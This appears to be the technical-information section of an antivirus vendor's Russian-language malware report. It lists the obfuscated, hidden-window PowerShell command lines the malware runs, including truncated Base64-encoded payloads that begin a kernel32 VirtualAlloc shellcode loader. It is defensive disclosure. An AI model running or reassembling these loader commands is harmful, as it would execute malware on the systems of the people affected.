Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 -C "s''v TqQ -;s''v fy e''c;s''v JF ((g''v TqQ).value.toString()+(g''v fy).value.toString());powershell (g''v JF).value.toString() ('JABpAGoAVgAgAD0AIAAnACQAUQB2ACAAPQAgACcAJwBbAEQAbABsAEk...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 -C "s''v TqQ -;s''v fy e''c;s''v JF ((g''v TqQ).value.toString()+(g''v fy).value.toString());powershell (g''v JF).value.toString() ('JABpAGoAVgAgAD0AIAAnACQAUQB2ACAAPQAgACcAJwBbAEQAbABsAEk...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ec JABpAGoAVgAgAD0AIAAnACQAUQB2ACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgA...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -e''c JABRAHYAIAA9ACAAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQB...